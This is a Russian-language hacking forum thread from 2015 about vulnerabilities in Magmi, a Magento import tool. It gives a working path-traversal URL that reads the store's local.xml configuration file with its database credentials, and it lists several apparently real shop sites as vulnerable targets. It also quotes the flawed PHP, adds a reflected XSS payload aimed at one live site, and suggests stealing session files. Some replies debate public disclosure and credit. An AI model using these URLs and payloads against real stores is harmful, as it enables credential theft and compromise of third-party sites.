HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.02.2015, 21:44
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Локальня читалка Magento:

http://localhost/magmi/web/download_file.php?file=../../app/etc/local.xml

Пример уязвимых урлов:

Цитата:
Сообщение от None  
_http://bentextiles.com/magmi/web/download_file.php?file=../../app/etc/local.xml
_http://mengotti-online.com/shop/magmi/web/download_file.php?file=../../app/etc/local.xml
_http://www.lowellcraft.com/magmi/web/download_file.php?file=../../app/etc/local.xml
Уязвимый код:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"file"[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]=@[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"r"[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$err[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]error_get_last[/COLOR][COLOR="#007700"]();

if([/
COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]!==[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"])

{

@[/
COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$f[/COLOR][COLOR="#007700"]);

}

if([/
COLOR][COLOR="#0000BB"]$err[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"])

{

[/
COLOR][COLOR="#FF8000"]// Extract the type of file which will be sent to the browser as a header

[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]filetype[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);



[/COLOR][COLOR="#FF8000"]// Get a date and timestamp

[/COLOR][COLOR="#0000BB"]$today[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"F j, Y, g:i a"[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$time[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]();



[/COLOR][COLOR="#FF8000"]// Send file headers

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Content-type:[/COLOR][COLOR="#0000BB"]$type[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Content-Disposition: attachment;filename="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]basename[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]));

[/
COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Content-Transfer-Encoding: binary"[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Pragma: no-cache'[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'Expires: 0'[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#FF8000"]// Send the file contents.

[/COLOR][COLOR="#0000BB"]set_time_limit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]readfile[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);

}

else

{

[/
COLOR][COLOR="#0000BB"]print_r[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$err[/COLOR][COLOR="#007700"]);

}[/
COLOR][/COLOR
P.S: В гугле по этой баге ничего не нашел.

P.S:

Обнаружил случайно в пакете с обновлением фикса баги

_http://www.exploit-db.com/exploits/35052/

сам фикс с багой, читалкой на гитхабе

https://github.com/dweeves/magmi-git Magento CE 1.8.x & 1.9.x
 
Ответить с цитированием

  #2  
Старый 18.05.2015, 21:30
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Хм, Magento на FreeBSD, возможно, можно сразу скомпроментировать, так как при чтении директории(это тоже файл!) можно получить список файлов. Сессия по умолчанию пишется в файловую си-му в install-dir/var/session обычно, в БД редко(в Wizard установщике по дефолту файловая си-ма )
 
Ответить с цитированием

  #3  
Старый 06.09.2015, 14:53
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Может пора спустить в паблик?
 
Ответить с цитированием

  #4  
Старый 06.09.2015, 16:39
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Не стоит
 
Ответить с цитированием

  #5  
Старый 07.09.2015, 11:26
Rebz
Флудер
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

В целом, стоит - не стоит, решать автору
 
Ответить с цитированием

  #6  
Старый 07.09.2015, 11:42
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

спускай, а на гитхабе сделаем ссылку на пост)) пускай фиксят, бага все равно мало полезная...

P.S:Пасивная XSS

http://www.lowellcraft.com/magmi/web/ajax_gettime.php

POSTrefix=alert('xss')

magmi/web/ajax_gettime.php

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
При GET запросе на примерной площадке сробатывает мод секьюрети
 
Ответить с цитированием

  #7  
Старый 06.01.2016, 16:59
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

ППЦ(((( https://www.trustwave.com/Resources...mmerce-platform-Magento-targeted-in-the-wild/ - себе багу присвоили, разместили статью от 13.10.2015
 
Ответить с цитированием

  #8  
Старый 06.01.2016, 19:11
ZodiaX
Новичок
Регистрация: 07.05.2009
Сообщений: 14
Провел на форуме:
44902

Репутация: 0
По умолчанию

Оперативно они...

хм, похожая бага тоже от февраля https://packetstormsecurity.com/file...gmi-lfixss.txt
 
Ответить с цитированием

  #9  
Старый 06.01.2016, 20:54
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от ZodiaX  
ZodiaX said:

Оперативно они...
хм, похожая бага тоже от февраля
https://packetstormsecurity.com/file...gmi-lfixss.txt
Да, только там при правильном подходе идет выполнения php кода, а тут просто читалка
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ